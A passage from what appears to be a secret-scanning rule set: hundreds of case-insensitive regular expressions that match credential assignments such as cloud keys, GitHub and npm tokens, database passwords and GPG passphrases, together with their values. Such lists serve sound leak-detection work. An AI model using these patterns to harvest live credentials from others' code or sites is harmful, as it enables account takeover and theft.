"(?i)secretaccesskey(=| =|:| :).{1,32}" + - "(?i)secret[_-]?key[_-]?base(=| =|:| :).{1,32}" + - "(?i)secret[_-]?9(=| =|:| :).{1,32}" + - "(?i)secret[_-]?8(=| =|:| :).{1,32}" + - "(?i)secret[_-]?7(=| =|:| :).{1,32}" + - "(?i)secret[_-]?6(=| =|:| :).{1,32}" + - "(?i)secret[_-]?5(=| =|:| :).{1,32}" + - "(?i)secret[_-]?4(=| =|:| :).{1,32}" + - "(?i)secret[_-]?3(=| =|:| :).{1,32}" + - "(?i)secret[_-]?2(=| =|:| :).{1,32}" + - "(?i)secret[_-]?11(=| =|:| :).{1,32}" + - "(?i)secret[_-]?10(=| =|:| :).{1,32}" + - "(?i)secret[_-]?1(=| =|:| :).{1,32}" + - "(?i)secret[_-]?0(=| =|:| :).{1,32}" + - "(?i)sdr[_-]?token(=| =|:| :).{1,32}" + - "(?i)scrutinizer[_-]?token(=| =|:| :).{1,32}" + - "(?i)sauce[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)sandbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)sandbox[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token(=| =|:| :).{1,32}" + - "(?i)salesforce[_-]?bulk[_-]?test[_-]?password(=| =|:| :).{1,32}" + - "(?i)sacloud[_-]?api(=| =|:| :).{1,32}" + - "(?i)sacloud[_-]?access[_-]?token[_-]?secret(=| =|:| :).{1,32}" + - "(?i)sacloud[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)s3[_-]?user[_-]?secret(=| =|:| :).{1,32}" + - "(?i)s3[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)s3[_-]?secret[_-]?assets(=| =|:| :).{1,32}" + - "(?i)s3[_-]?secret[_-]?app[_-]?logs(=| =|:| :).{1,32}" + - "(?i)s3[_-]?key[_-]?assets(=| =|:| :).{1,32}" + - "(?i)s3[_-]?key[_-]?app[_-]?logs(=| =|:| :).{1,32}" + - "(?i)s3[_-]?key(=| =|:| :).{1,32}" + - "(?i)s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com(=| =|:| :).{1,32}" + - "(?i)s3[_-]?bucket[_-]?name[_-]?assets(=| =|:| :).{1,32}" + - "(?i)s3[_-]?bucket[_-]?name[_-]?app[_-]?logs(=| =|:| :).{1,32}" + - "(?i)s3[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)s3[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)rubygems[_-]?auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)rtd[_-]?store[_-]?pass(=| =|:| :).{1,32}" + - "(?i)rtd[_-]?key[_-]?pass(=| =|:| :).{1,32}" + - "(?i)route53[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)ropsten[_-]?private[_-]?key(=| =|:| :).{1,32}" + - "(?i)rinkeby[_-]?private[_-]?key(=| =|:| :).{1,32}" + - "(?i)rest[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)repotoken(=| =|:| :).{1,32}" + - "(?i)reporting[_-]?webdav[_-]?url(=| =|:| :).{1,32}" + - "(?i)reporting[_-]?webdav[_-]?pwd(=| =|:| :).{1,32}" + - "(?i)release[_-]?token(=| =|:| :).{1,32}" + - "(?i)release[_-]?gh[_-]?token(=| =|:| :).{1,32}" + - "(?i)registry[_-]?secure(=| =|:| :).{1,32}" + - "(?i)registry[_-]?pass(=| =|:| :).{1,32}" + - "(?i)refresh[_-]?token(=| =|:| :).{1,32}" + - "(?i)rediscloud[_-]?url(=| =|:| :).{1,32}" + - "(?i)redis[_-]?stunnel[_-]?urls(=| =|:| :).{1,32}" + - "(?i)randrmusicapiaccesstoken(=| =|:| :).{1,32}" + - "(?i)rabbitmq[_-]?password(=| =|:| :).{1,32}" + - "(?i)quip[_-]?token(=| =|:| :).{1,32}" + - "(?i)qiita[_-]?token(=| =|:| :).{1,32}" + - "(?i)pypi[_-]?passowrd(=| =|:| :).{1,32}" + - "(?i)pushover[_-]?token(=| =|:| :).{1,32}" + - "(?i)publish[_-]?secret(=| =|:| :).{1,32}" + - "(?i)publish[_-]?key(=| =|:| :).{1,32}" + - "(?i)publish[_-]?access(=| =|:| :).{1,32}" + - "(?i)project[_-]?config(=| =|:| :).{1,32}" + - "(?i)prod[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)prod[_-]?password(=| =|:| :).{1,32}" + - "(?i)prod[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)private[_-]?signing[_-]?password(=| =|:| :).{1,32}" + - "(?i)pring[_-]?mail[_-]?username(=| =|:| :).{1,32}" + - "(?i)preferred[_-]?username(=| =|:| :).{1,32}" + - "(?i)prebuild[_-]?auth(=| =|:| :).{1,32}" + - "(?i)postgresql[_-]?pass(=| =|:| :).{1,32}" + - "(?i)postgresql[_-]?db(=| =|:| :).{1,32}" + - "(?i)postgres[_-]?env[_-]?postgres[_-]?password(=| =|:| :).{1,32}" + - "(?i)postgres[_-]?env[_-]?postgres[_-]?db(=| =|:| :).{1,32}" + - "(?i)plugin[_-]?password(=| =|:| :).{1,32}" + - "(?i)plotly[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)places[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)places[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)pg[_-]?host(=| =|:| :).{1,32}" + - "(?i)pg[_-]?database(=| =|:| :).{1,32}" + - "(?i)personal[_-]?secret(=| =|:| :).{1,32}" + - "(?i)personal[_-]?key(=| =|:| :).{1,32}" + - "(?i)percy[_-]?token(=| =|:| :).{1,32}" + - "(?i)percy[_-]?project(=| =|:| :).{1,32}" + - "(?i)paypal[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)passwordtravis(=| =|:| :).{1,32}" + - "(?i)parse[_-]?js[_-]?key(=| =|:| :).{1,32}" + - "(?i)pagerduty[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)packagecloud[_-]?token(=| =|:| :).{1,32}" + - "(?i)ossrh[_-]?username(=| =|:| :).{1,32}" + - "(?i)ossrh[_-]?secret(=| =|:| :).{1,32}" + - "(?i)ossrh[_-]?password(=| =|:| :).{1,32}" + - "(?i)ossrh[_-]?pass(=| =|:| :).{1,32}" + - "(?i)ossrh[_-]?jira[_-]?password(=| =|:| :).{1,32}" + - "(?i)os[_-]?password(=| =|:| :).{1,32}" + - "(?i)os[_-]?auth[_-]?url(=| =|:| :).{1,32}" + - "(?i)org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :).{1,32}" + - "(?i)org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :).{1,32}" + - "(?i)openwhisk[_-]?key(=| =|:| :).{1,32}" + - "(?i)open[_-]?whisk[_-]?key(=| =|:| :).{1,32}" + - "(?i)onesignal[_-]?user[_-]?auth[_-]?key(=| =|:| :).{1,32}" + - "(?i)onesignal[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)omise[_-]?skey(=| =|:| :).{1,32}" + - "(?i)omise[_-]?pubkey(=| =|:| :).{1,32}" + - "(?i)omise[_-]?pkey(=| =|:| :).{1,32}" + - "(?i)omise[_-]?key(=| =|:| :).{1,32}" + - "(?i)okta[_-]?oauth2[_-]?clientsecret(=| =|:| :).{1,32}" + - "(?i)okta[_-]?oauth2[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)okta[_-]?client[_-]?token(=| =|:| :).{1,32}" + - "(?i)ofta[_-]?secret(=| =|:| :).{1,32}" + - "(?i)ofta[_-]?region(=| =|:| :).{1,32}" + - "(?i)ofta[_-]?key(=| =|:| :).{1,32}" + - "(?i)octest[_-]?password(=| =|:| :).{1,32}" + - "(?i)octest[_-]?app[_-]?username(=| =|:| :).{1,32}" + - "(?i)octest[_-]?app[_-]?password(=| =|:| :).{1,32}" + - "(?i)oc[_-]?pass(=| =|:| :).{1,32}" + - "(?i)object[_-]?store[_-]?creds(=| =|:| :).{1,32}" + - "(?i)object[_-]?store[_-]?bucket(=| =|:| :).{1,32}" + - "(?i)object[_-]?storage[_-]?region[_-]?name(=| =|:| :).{1,32}" + - "(?i)object[_-]?storage[_-]?password(=| =|:| :).{1,32}" + - "(?i)oauth[_-]?token(=| =|:| :).{1,32}" + - "(?i)numbers[_-]?service[_-]?pass(=| =|:| :).{1,32}" + - "(?i)nuget[_-]?key(=| =|:| :).{1,32}" + - "(?i)nuget[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)nuget[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)npm[_-]?token(=| =|:| :).{1,32}" + - "(?i)npm[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)npm[_-]?password(=| =|:| :).{1,32}" + - "(?i)npm[_-]?email(=| =|:| :).{1,32}" + - "(?i)npm[_-]?auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)npm[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)npm[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)now[_-]?token(=| =|:| :).{1,32}" + - "(?i)non[_-]?token(=| =|:| :).{1,32}" + - "(?i)node[_-]?pre[_-]?gyp[_-]?secretaccesskey(=| =|:| :).{1,32}" + - "(?i)node[_-]?pre[_-]?gyp[_-]?github[_-]?token(=| =|:| :).{1,32}" + - "(?i)node[_-]?pre[_-]?gyp[_-]?accesskeyid(=| =|:| :).{1,32}" + - "(?i)node[_-]?env(=| =|:| :).{1,32}" + - "(?i)ngrok[_-]?token(=| =|:| :).{1,32}" + - "(?i)ngrok[_-]?auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)nexuspassword(=| =|:| :).{1,32}" + - "(?i)nexus[_-]?password(=| =|:| :).{1,32}" + - "(?i)new[_-]?relic[_-]?beta[_-]?token(=| =|:| :).{1,32}" + - "(?i)netlify[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)nativeevents(=| =|:| :).{1,32}" + - "(?i)mysqlsecret(=| =|:| :).{1,32}" + - "(?i)mysqlmasteruser(=| =|:| :).{1,32}" + - "(?i)mysql[_-]?username(=| =|:| :).{1,32}" + - "(?i)mysql[_-]?user(=| =|:| :).{1,32}" + - "(?i)mysql[_-]?root[_-]?password(=| =|:| :).{1,32}" + - "(?i)mysql[_-]?password(=| =|:| :).{1,32}" + - "(?i)mysql[_-]?hostname(=| =|:| :).{1,32}" + - "(?i)mysql[_-]?database(=| =|:| :).{1,32}" + - "(?i)my[_-]?secret[_-]?env(=| =|:| :).{1,32}" + - "(?i)multi[_-]?workspace[_-]?sid(=| =|:| :).{1,32}" + - "(?i)multi[_-]?workflow[_-]?sid(=| =|:| :).{1,32}" + - "(?i)multi[_-]?disconnect[_-]?sid(=| =|:| :).{1,32}" + - "(?i)multi[_-]?connect[_-]?sid(=| =|:| :).{1,32}" + - "(?i)multi[_-]?bob[_-]?sid(=| =|:| :).{1,32}" + - "(?i)minio[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)minio[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)mile[_-]?zero[_-]?key(=| =|:| :).{1,32}" + - "(?i)mh[_-]?password(=| =|:| :).{1,32}" + - "(?i)mh[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)mg[_-]?public[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)mg[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)mapboxaccesstoken(=| =|:| :).{1,32}" + - "(?i)mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)mapbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)mapbox[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)mapbox[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)manifest[_-]?app[_-]?url(=| =|:| :).{1,32}" + - "(?i)manifest[_-]?app[_-]?token(=| =|:| :).{1,32}" + - "(?i)mandrill[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)managementapiaccesstoken(=| =|:| :).{1,32}" + - "(?i)management[_-]?token(=| =|:| :).{1,32}" + - "(?i)manage[_-]?secret(=| =|:| :).{1,32}" + - "(?i)manage[_-]?key(=| =|:| :).{1,32}" + - "(?i)mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)mailgun[_-]?pub[_-]?key(=| =|:| :).{1,32}" + - "(?i)mailgun[_-]?pub[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)mailgun[_-]?priv[_-]?key(=| =|:| :).{1,32}" + - "(?i)mailgun[_-]?password(=| =|:| :).{1,32}" + - "(?i)mailgun[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)mailgun[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)mailer[_-]?password(=| =|:| :).{1,32}" + - "(?i)mailchimp[_-]?key(=| =|:| :).{1,32}" + - "(?i)mailchimp[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)mail[_-]?password(=| =|:| :).{1,32}" + - "(?i)magento[_-]?password(=| =|:| :).{1,32}" + - "(?i)magento[_-]?auth[_-]?username (=| =|:| :).{1,32}" + - "(?i)magento[_-]?auth[_-]?password(=| =|:| :).{1,32}" + - "(?i)lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password(=| =|:| :).{1,32}" + - "(?i)lottie[_-]?upload[_-]?cert[_-]?key[_-]?password(=| =|:| :).{1,32}" + - "(?i)lottie[_-]?s3[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)lottie[_-]?happo[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)lottie[_-]?happo[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)looker[_-]?test[_-]?runner[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)ll[_-]?shared[_-]?key(=| =|:| :).{1,32}" + - "(?i)ll[_-]?publish[_-]?url(=| =|:| :).{1,32}" + - "(?i)linux[_-]?signing[_-]?key(=| =|:| :).{1,32}" + - "(?i)linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)lighthouse[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)lektor[_-]?deploy[_-]?username(=| =|:| :).{1,32}" + - "(?i)lektor[_-]?deploy[_-]?password(=| =|:| :).{1,32}" + - "(?i)leanplum[_-]?key(=| =|:| :).{1,32}" + - "(?i)kxoltsn3vogdop92m(=| =|:| :).{1,32}" + - "(?i)kubeconfig(=| =|:| :).{1,32}" + - "(?i)kubecfg[_-]?s3[_-]?path(=| =|:| :).{1,32}" + - "(?i)kovan[_-]?private[_-]?key(=| =|:| :).{1,32}" + - "(?i)keystore[_-]?pass(=| =|:| :).{1,32}" + - "(?i)kafka[_-]?rest[_-]?url(=| =|:| :).{1,32}" + - "(?i)kafka[_-]?instance[_-]?name(=| =|:| :).{1,32}" + - "(?i)kafka[_-]?admin[_-]?url(=| =|:| :).{1,32}" + - "(?i)jwt[_-]?secret(=| =|:| :).{1,32}" + - "(?i)jdbc:mysql(=| =|:| :).{1,32}" + - "(?i)jdbc[_-]?host(=| =|:| :).{1,32}" + - "(?i)jdbc[_-]?databaseurl(=| =|:| :).{1,32}" + - "(?i)itest[_-]?gh[_-]?token(=| =|:| :).{1,32}" + - "(?i)ios[_-]?docs[_-]?deploy[_-]?token(=| =|:| :).{1,32}" + - "(?i)internal[_-]?secrets(=| =|:| :).{1,32}" + - "(?i)integration[_-]?test[_-]?appid(=| =|:| :).{1,32}" + - "(?i)integration[_-]?test[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)index[_-]?name(=| =|:| :).{1,32}" + - "(?i)ij[_-]?repo[_-]?username(=| =|:| :).{1,32}" + - "(?i)ij[_-]?repo[_-]?password(=| =|:| :).{1,32}" + - "(?i)hub[_-]?dxia2[_-]?password(=| =|:| :).{1,32}" + - "(?i)homebrew[_-]?github[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)hockeyapp[_-]?token(=| =|:| :).{1,32}" + - "(?i)heroku[_-]?token(=| =|:| :).{1,32}" + - "(?i)heroku[_-]?email(=| =|:| :).{1,32}" + - "(?i)heroku[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)hb[_-]?codesign[_-]?key[_-]?pass(=| =|:| :).{1,32}" + - "(?i)hb[_-]?codesign[_-]?gpg[_-]?pass(=| =|:| :).{1,32}" + - "(?i)hab[_-]?key(=| =|:| :).{1,32}" + - "(?i)hab[_-]?auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)grgit[_-]?user(=| =|:| :).{1,32}" + - "(?i)gren[_-]?github[_-]?token(=| =|:| :).{1,32}" + - "(?i)gradle[_-]?signing[_-]?password(=| =|:| :).{1,32}" + - "(?i)gradle[_-]?signing[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)gradle[_-]?publish[_-]?secret(=| =|:| :).{1,32}" + - "(?i)gradle[_-]?publish[_-]?key(=| =|:| :).{1,32}" + - "(?i)gpg[_-]?secret[_-]?keys(=| =|:| :).{1,32}" + - "(?i)gpg[_-]?private[_-]?key(=| =|:| :).{1,32}" + - "(?i)gpg[_-]?passphrase(=| =|:| :).{1,32}" + - "(?i)gpg[_-]?ownertrust(=| =|:| :).{1,32}" + - "(?i)gpg[_-]?keyname(=| =|:| :).{1,32}" + - "(?i)gpg[_-]?key[_-]?name(=| =|:| :).{1,32}" + - "(?i)google[_-]?private[_-]?key(=| =|:| :).{1,32}" + - "(?i)google[_-]?maps[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)google[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)google[_-]?client[_-]?id(=| =|:| :).{1,32}" + - "(?i)google[_-]?client[_-]?email(=| =|:| :).{1,32}" + - "(?i)google[_-]?account[_-]?type(=| =|:| :).{1,32}" + - "(?i)gogs[_-]?password(=| =|:| :).{1,32}" + - "(?i)gitlab[_-]?user[_-]?email(=| =|:| :).{1,32}" + - "(?i)github[_-]?tokens(=| =|:| :).{1,32}" + - "(?i)github[_-]?token(=| =|:| :).{1,32}" + - "(?i)github[_-]?repo(=| =|:| :).{1,32}" + - "(?i)github[_-]?release[_-]?token(=| =|:| :).{1,32}" + - "(?i)github[_-]?pwd(=| =|:| :).{1,32}" + - "(?i)github[_-]?password(=| =|:| :).{1,32}" + - "(?i)github[_-]?oauth[_-]?token(=| =|:| :).{1,32}" + - "(?i)github[_-]?oauth(=| =|:| :).{1,32}" + - "(?i)github[_-]?key(=| =|:| :).{1,32}" + - "(?i)github[_-]?hunter[_-]?username(=| =|:| :).{1,32}" + - "(?i)github[_-]?hunter[_-]?token(=| =|:| :).{1,32}" + - "(?i)github[_-]?deployment[_-]?token(=| =|:| :).{1,32}" + - "(?i)github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass(=| =|:| :).{1,32}" + - "(?i)github[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)github[_-]?auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)github[_-]?auth(=| =|:| :).{1,32}" + - "(?i)github[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)github[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)github[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)git[_-]?token(=| =|:| :).{1,32}" + - "(?i)git[_-]?name(=| =|:| :).{1,32}" + - "(?i)git[_-]?email(=| =|:| :).{1,32}" + - "(?i)git[_-]?committer[_-]?name(=| =|:| :).{1,32}" + - "(?i)git[_-]?committer[_-]?email(=| =|:| :).{1,32}" + - "(?i)git[_-]?author[_-]?name(=| =|:| :).{1,32}" + - "(?i)git[_-]?author[_-]?email(=| =|:| :).{1,32}" + - "(?i)ghost[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)ghb[_-]?token(=| =|:| :).{1,32}" + - "(?i)gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)gh[_-]?token(=| =|:| :).{1,32}" + - "(?i)gh[_-]?repo[_-]?token(=| =|:| :).{1,32}" + - "(?i)gh[_-]?oauth[_-]?token(=| =|:| :).{1,32}" + - "(?i)gh[_-]?oauth[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id(=| =|:| :).{1,32}" + - "(?i)gh[_-]?next[_-]?oauth[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)gh[_-]?email(=| =|:| :).{1,32}" + - "(?i)gh[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)gcs[_-]?bucket(=| =|:| :).{1,32}" + - "(?i)gcr[_-]?password(=| =|:| :).{1,32}" + - "(?i)gcloud[_-]?service[_-]?key(=| =|:| :).{1,32}" + - "(?i)gcloud[_-]?project(=| =|:| :).{1,32}" + - "(?i)gcloud[_-]?bucket(=| =|:| :).{1,32}" + - "(?i)ftp[_-]?username(=| =|:| :).{1,32}" + - "(?i)ftp[_-]?user(=| =|:| :).{1,32}" + - "(?i)ftp[_-]?pw(=| =|:| :).{1,32}" + - "(?i)ftp[_-]?password(=| =|:| :).{1,32}" + - "(?i)ftp[_-]?login(=| =|:| :).{1,32}" + - "(?i)ftp[_-]?host(=| =|:| :).{1,32}" + - "(?i)fossa[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)flickr[_-]?api[_-]?secret(=| =|:| :).{1,32}" + - "(?i)flickr[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)flask[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)firefox[_-]?secret(=| =|:| :).{1,32}" + - "(?i)firebase[_-]?token(=| =|:| :).{1,32}" + - "(?i)firebase[_-]?project[_-]?develop(=| =|:| :).{1,32}" + - "(?i)firebase[_-]?key(=| =|:| :).{1,32}" + - "(?i)firebase[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)firebase[_-]?api[_-]?json(=| =|:| :).{1,32}" + - "(?i)file[_-]?password(=| =|:| :).{1,32}" + - "(?i)exp[_-]?password(=| =|:| :).{1,32}" + - "(?i)eureka[_-]?awssecretkey(=| =|:| :).{1,32}" + - "(?i)env[_-]?sonatype[_-]?password(=| =|:| :).{1,32}" + - "(?i)env[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)env[_-]?secret(=| =|:| :).{1,32}" + - "(?i)env[_-]?key(=| =|:| :).{1,32}" + - "(?i)env[_-]?heroku[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)env[_-]?github[_-]?oauth[_-]?token(=| =|:| :).{1,32}" + - "(?i)end[_-]?user[_-]?password(=| =|:| :).{1,32}" + - "(?i)encryption[_-]?password(=| =|:| :).{1,32}" + - "(?i)elasticsearch[_-]?password(=| =|:| :).{1,32}" + - "(?i)elastic[_-]?cloud[_-]?auth(=| =|:| :).{1,32}" + - "(?i)dsonar[_-]?projectkey(=| =|:| :).{1,32}" + - "(?i)dsonar[_-]?login(=| =|:| :).{1,32}" + - "(?i)droplet[_-]?travis[_-]?password(=| =|:| :).{1,32}" + - "(?i)dropbox[_-]?oauth[_-]?bearer(=| =|:| :).{1,32}" + - "(?i)doordash[_-]?auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)dockerhubpassword(=| =|:| :).{1,32}" + - "(?i)dockerhub[_-]?password(=| =|:| :).{1,32}" + - "(?i)docker[_-]?token(=| =|:| :).{1,32}" + - "(?i)docker[_-]?postgres[_-]?url(=| =|:| :).{1,32}" + - "(?i)docker[_-]?password(=| =|:| :).{1,32}" + - "(?i)docker[_-]?passwd(=| =|:| :).{1,32}" + - "(?i)docker[_-]?pass(=| =|:| :).{1,32}" + - "(?i)docker[_-]?key(=| =|:| :).{1,32}" + - "(?i)docker[_-]?hub[_-]?password(=| =|:| :).{1,32}" + - "(?i)digitalocean[_-]?ssh[_-]?key[_-]?ids(=| =|:| :).{1,32}" + - "(?i)digitalocean[_-]?ssh[_-]?key[_-]?body(=| =|:| :).{1,32}" + - "(?i)digitalocean[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)dgpg[_-]?passphrase(=| =|:| :).{1,32}" + - "(?i)deploy[_-]?user(=| =|:| :).{1,32}" + - "(?i)deploy[_-]?token(=| =|:| :).{1,32}" + - "(?i)deploy[_-]?secure(=| =|:| :).{1,32}" + - "(?i)deploy[_-]?password(=| =|:| :).{1,32}" + - "(?i)ddgc[_-]?github[_-]?token(=| =|:| :).{1,32}" + - "(?i)ddg[_-]?test[_-]?email[_-]?pw(=| =|:| :).{1,32}" + - "(?i)ddg[_-]?test[_-]?email(=| =|:| :).{1,32}" + - "(?i)db[_-]?username(=| =|:| :).{1,32}" + - "(?i)db[_-]?user(=| =|:| :).{1,32}" + - "(?i)db[_-]?pw(=| =|:| :).{1,32}" + - "(?i)db[_-]?password(=| =|:| :).{1,32}" + - "(?i)db[_-]?host(=| =|:| :).{1,32}" + - "(?i)db[_-]?database(=| =|:| :).{1,32}" + - "(?i)db[_-]?connection(=| =|:| :).{1,32}" + - "(?i)datadog[_-]?app[_-]?key(=| =|:| :).{1,32}" + - "(?i)datadog[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)database[_-]?username(=| =|:| :).{1,32}" + - "(?i)database[_-]?user(=| =|:| :).{1,32}" + - "(?i)database[_-]?port(=| =|:| :).{1,32}" + - "(?i)database[_-]?password(=| =|:| :).{1,32}" + - "(?i)database[_-]?name(=| =|:| :).{1,32}" + - "(?i)database[_-]?host(=| =|:| :).{1,32}" + - "(?i)danger[_-]?github[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)cypress[_-]?record[_-]?key(=| =|:| :).{1,32}" + - "(?i)coverity[_-]?scan[_-]?token(=| =|:| :).{1,32}" + - "(?i)coveralls[_-]?token(=| =|:| :).{1,32}" + - "(?i)coveralls[_-]?repo[_-]?token(=| =|:| :).{1,32}" + - "(?i)coveralls[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)cos[_-]?secrets(=| =|:| :).{1,32}" + - "(?i)conversation[_-]?username(=| =|:| :).{1,32}" + - "(?i)conversation[_-]?password(=| =|:| :).{1,32}" + - "(?i)contentful[_-]?v2[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)contentful[_-]?test[_-]?org[_-]?cma[_-]?token(=| =|:| :).{1,32}" + - "(?i)contentful[_-]?php[_-]?management[_-]?test[_-]?token(=| =|:| :).{1,32}" + - "(?i)contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new(=| =|:| :).{1,32}" + - "(?i)contentful[_-]?management[_-]?api[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)contentful[_-]?integration[_-]?management[_-]?token(=| =|:| :).{1,32}" + - "(?i)contentful[_-]?cma[_-]?test[_-]?token(=| =|:| :).{1,32}" + - "(?i)contentful[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)consumerkey(=| =|:| :).{1,32}" + - "(?i)consumer[_-]?key(=| =|:| :).{1,32}" + - "(?i)conekta[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)coding[_-]?token(=| =|:| :).{1,32}" + - "(?i)codecov[_-]?token(=| =|:| :).{1,32}" + - "(?i)codeclimate[_-]?repo[_-]?token(=| =|:| :).{1,32}" + - "(?i)codacy[_-]?project[_-]?token(=| =|:| :).{1,32}" + - "(?i)cocoapods[_-]?trunk[_-]?token(=| =|:| :).{1,32}" + - "(?i)cocoapods[_-]?trunk[_-]?email(=| =|:| :).{1,32}" + - "(?i)cn[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)cn[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)clu[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :).{1,32}" + - "(?i)clu[_-]?repo[_-]?url(=| =|:| :).{1,32}" + - "(?i)cloudinary[_-]?url[_-]?staging(=| =|:| :).{1,32}" + - "(?i)cloudinary[_-]?url(=| =|:| :).{1,32}" + - "(?i)cloudflare[_-]?email(=| =|:| :).{1,32}" + - "(?i)cloudflare[_-]?auth[_-]?key(=| =|:| :).{1,32}" + - "(?i)cloudflare[_-]?auth[_-]?email(=| =|:| :).{1,32}" + - "(?i)cloudflare[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?service[_-]?database(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?processed[_-]?database(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?password(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?parsed[_-]?database(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?order[_-]?database(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?instance(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?database(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?audited[_-]?database(=| =|:| :).{1,32}" + - "(?i)cloudant[_-]?archived[_-]?database(=| =|:| :).{1,32}" + - "(?i)cloud[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)clojars[_-]?password(=| =|:| 